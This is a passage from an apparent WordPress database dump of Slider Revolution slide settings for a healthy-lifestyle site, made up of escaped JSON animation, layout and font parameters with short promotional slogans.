From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"Power3.easeOut\",\"speed\":1000,\"start\":200,\"startRelative\":200},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"Power3.easeOut\",\"speed\":1000,\"start\":200,\"startRelative\":200},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"nothing\",\"speed\":500,\"start\":3000,\"startRelative\":1800,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\"},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"1\":{\"text\":\"It\'s time to kick start a new lifestyle\\n\",\"alias\":\"Start Healthy Life i...\",\"uid\":1,\"size\":{\"width\":{\"d\":{\"v\":\"805px\",\"e\":true},\"n\":{\"v\":\"805px\",\"e\":true},\"t\":{\"v\":\"805px\"},\"m\":{\"v\":\"382px\",\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"originalWidth\":\"805px\"},\"position\":{\"x\":{\"d\":{\"v\":\"-1px\",\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"-26px\",\"e\":true},\"n\":{\"v\":\"-25px\",\"e\":true},\"t\":{\"v\":\"-25px\"},\"m\":{\"v\":\"-30px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":6,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":6,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":600},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"Power3.easeOut\",\"speed\":1000,\"start\":600,\"startRelative\":600},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"Power3.easeOut\",\"speed\":1000,\"start\":600,\"startRelative\":600},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":3000,\"startRelative\":1400,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"Quicksand \",\"fontSize\":{\"d\":{\"v\":\"72px\",\"e\":true},\"n\":{\"v\":\"72px\",\"e\":true},\"t\":{\"v\":\"72px\"},\"m\":{\"v\":\"50px\",\"e\":true}},\"fontWeight\":{\"d\":{\"v\":\"900\",\"e\":true},\"n\":{\"v\":\"900\",\"e\":true},\"t\":{\"v\":\"900\"},\"m\":{\"v\":\"900\",\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"72px\",\"e\":true},\"n\":{\"v\":\"72px\",\"e\":true},\"t\":{\"v\":\"72px\"},\"m\":{\"v\":\"50px\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\"},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\"},\"3\":{\"text\":\"[qodef_button size=\\\"medium\\\" text=\\\"view more\\\" target=\\\"_self\\\" icon_pack=\\\"\\\" font_weight=\\\"\\\" text_transform=\\\"\\\"]\",\"alias\":\"[qodef_button size=\",\"uid\":3,\"size\":{\"width\":{\"d\":{\"v\":\"1200px\",\"e\":true},\"n\":{\"v\":\"1200px\",\"e\":true},\"t\":{\"v\":\"1200px\"},\"m\":{\"v\":\"1200px\",\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"originalWidth\":\"1200px\"},\"position\":{\"x\":{\"d\":{\"v\":\"516px\",\"e\":true},\"n\":{\"v\":\"512px\",\"e\":true},\"t\":{\"v\":\"512px\"},\"m\":{\"v\":\"511px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"98px\",\"e\":true},\"n\":{\"v\":\"105px\",\"e\":true},\"t\":{\"v\":\"105px\"},\"m\":{\"v\":\"118px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":7,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":7,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":1010},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"Power3.easeOut\",\"speed\":1000,\"start\":1010,\"startRelative\":1010},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"Power3.easeOut\",\"speed\":1000,\"start\":1010,\"startRelative\":1010},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":3000,\"startRelative\":990,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\"},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\"}}','{\"0\":\"\",\"version\":\"6.1.6\"}'),(3,2,2,'{\"title\":\"Slide\",\"bg\":{\"type\":\"image\",\"color\":\"#E7E7E7\",\"image\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h1-slide2-background.jpg\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"100\"}},\"thumb\":{\"dimension\":\"slider\"},\"info\":{\"params\":[{\"v\":\"02\"},{\"v\":\"03\"}]},\"timeline\":{\"slots\":[\"default\"],\"duration\":[1000]},\"effects\":{\"parallax\":\"9\"}}','{\"1\":{\"text\":\"Image 2\",\"alias\":\"Image 2\",\"uid\":1,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h1-slider1-graphic1.png\",\"imageId\":1043},\"size\":{\"width\":{\"d\":{\"v\":\"65px\",\"e\":true},\"n\":{\"v\":\"65px\",\"e\":true},\"t\":{\"v\":\"65px\"},\"m\":{\"v\":\"65px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"52px\",\"e\":true},\"n\":{\"v\":\"52px\",\"e\":true},\"t\":{\"v\":\"52px\"},\"m\":{\"v\":\"52px\",\"e\":true}},\"originalWidth\":65,\"originalHeight\":52,\"aspectRatio\":{\"d\":{\"v\":1.25},\"n\":{\"v\":1.25},\"t\":{\"v\":1.25},\"m\":{\"v\":1.25}}},\"position\":{\"x\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"v\":\"4px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"159px\",\"e\":true},\"n\":{\"v\":\"-139px\",\"e\":true},\"t\":{\"v\":\"-139px\"},\"m\":{\"v\":\"-175px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":5,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":5,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":200},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"Power3.easeOut\",\"speed\":1000,\"start\":200,\"startRelative\":200},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"Power3.easeOut\",\"speed\":1000,\"start\":200,\"startRelative\":200},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"nothing\",\"speed\":500,\"start\":3000,\"startRelative\":1800,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\"},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"2\":{\"text\":\"Start eating, feeling & living better today\",\"alias\":\"Start Healthy Life i...\",\"uid\":2,\"size\":{\"width\":{\"d\":{\"v\":\"805px\",\"e\":true},\"n\":{\"v\":\"805px\",\"e\":true},\"t\":{\"v\":\"805px\"},\"m\":{\"v\":\"382px\",\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"originalWidth\":\"805px\"},\"position\":{\"x\":{\"d\":{\"v\":\"-1px\",\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"-27px\",\"e\":true},\"n\":{\"v\":\"-25px\",\"e\":true},\"t\":{\"v\":\"-25px\"},\"m\":{\"v\":\"-30px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":6,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":6,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":600},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"Power3.easeOut\",\"speed\":1000,\"start\":600,\"startRelative\":600},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"Power3.easeOut\",\"speed\":1000,\"start\":600,\"startRelative\":600},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim 